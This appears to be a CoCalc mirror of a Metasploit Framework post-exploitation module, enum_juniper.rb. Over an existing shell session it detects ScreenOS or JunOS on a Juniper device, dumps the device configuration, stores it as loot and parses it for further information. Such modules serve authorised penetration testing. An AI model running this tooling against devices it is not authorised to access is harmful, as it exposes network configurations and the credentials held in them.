CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/networking/gather/enum_juniper.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Auxiliary::Juniper

8
  include Msf::Exploit::Deprecated

9
  moved_from 'post/juniper/gather/enum_juniper'

10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Juniper Gather Device General Information',

15
        'Description' => %q{

16
          This module collects a Juniper ScreenOS and JunOS device information and configuration.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'h00die'],

20
        'Platform' => [ 'juniper'],

21
        'SessionTypes' => [ 'shell' ]

22
      )

23
    )

24
  end

25


26
  def run

27
    # Get device prompt

28
    prompt = session.shell_command('')

29


30
    os_type = 'junos'

31
    command_prefix = ''

32
    if prompt.end_with?('% ') # we're in an SSH shell

33
      vprint_status('In an SSH shell')

34
      command_prefix = 'cli '

35
    elsif prompt.end_with?('-> ') # hit cli of ScreenOS, change the os_type

36
      os_type = 'screenos'

37
    elsif prompt.end_with?('> ') # cli of JunOS

38
      vprint_status('In a cli shell')

39
    elsif prompt.end_with?('# ') # we're in a cli>configure

40
      vprint_status('In a cli>configure shell')

41
      session.shell_command('quit') # gets us back to the cli non-config

42
    elsif session.shell_command('?') =~ /\?: No match\./ # confirmed ssh shell

43
      vprint_status('In an SSH shell')

44
      command_prefix = 'cli '

45
    end

46


47
    if os_type == 'screenos'

48
      # Set terminal length to 0 so no paging is required

49
      session.shell_write("term len 0 \n")

50
    end

51


52
    # Get version info

53
    print_status('Getting version information')

54
    get_system_cmd = os_type.eql?('screenos') ? 'get system' : 'show configuration'

55
    get_system_cmd = command_prefix + get_system_cmd

56
    system_out = session.shell_command(get_system_cmd)

57
    # https://github.com/h00die/MSF-Testing-Scripts/blob/master/juniper_strings.py#L2

58
    # https://kb.juniper.net/InfoCenter/index?page=content&id=KB6489

59
    if /^Product Name: (?<ver>SSG|NetScreen)/i =~ system_out

60
      vprint_status("Original OS Guess #{os_type}, is now ScreenOS #{ver}")

61
      os_type = 'screenos'

62
    elsif /^Product Name: (?<ver>.+)/i =~ system_out

63
      vprint_status("Original OS Guess #{os_type}, is now JunOS #{ver}")

64
      os_type = 'junos'

65
    elsif /^version (?<ver>[.\dR]+);/i =~ system_out

66
      vprint_status("Original OS Guess #{os_type}, is now JunOS #{ver}")

67
      os_type = 'junos'

68
    end

69


70
    print_status("The device OS is #{os_type}")

71


72
    case os_type

73
    when /screenos/

74
      ver_loc = store_loot('juniper.screenos.config',

75
                           'text/plain',

76
                           session,

77
                           system_out.strip,

78
                           'config.txt',

79
                           'Juniper ScreenOS Config')

80
    when /junos/

81
      ver_loc = store_loot('juniper.junos.config',

82
                           'text/plain',

83
                           session,

84
                           system_out.strip,

85
                           'config.txt',

86
                           'Juniper JunOS Config')

87
    end

88


89
    # Print the version of VERBOSE set to true.

90
    vprint_good("Config information stored in to loot #{ver_loc}")

91


92
    # run additional information gathering

93
    enum_configs(prompt, os_type, command_prefix)

94
  end

95


96
  # run commands found in exec mode under privilege 1

97
  def enum_configs(prompt, os_type, command_prefix)

98
    host = session.session_host

99
    port = session.session_port

100
    exec_commands = [

101
      {

102
        'cmd' => { 'junos' => 'show configuration', 'screenos' => 'get config' },

103
        'fn' => 'get_config',

104
        'desc' => 'Get Device Config on Juniper Device'

105
      },

106
    ]

107
    exec_commands.each do |ec|

108
      command = command_prefix + ec['cmd'][os_type]

109
      cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/, '')

110
      next if cmd_out =~ /unknown keyword/ # screenOS

111


112
      print_status("Gathering info from #{command}")

113
      cmd_loc = store_loot("juniper.#{ec['fn']}",

114
                           'text/plain',

115
                           session,

116
                           cmd_out.strip,

117
                           "#{ec['fn']}.txt",

118
                           ec['desc'])

119
      vprint_good("Saving to #{cmd_loc}")

120
      if os_type == 'screenos'

121
        juniper_screenos_config_eater(host, port, cmd_out.strip)

122
      elsif os_type == 'junos'

123
        juniper_junos_config_eater(host, port, cmd_out.strip)

124
      end

125
    end

126
  end

127
end

128


129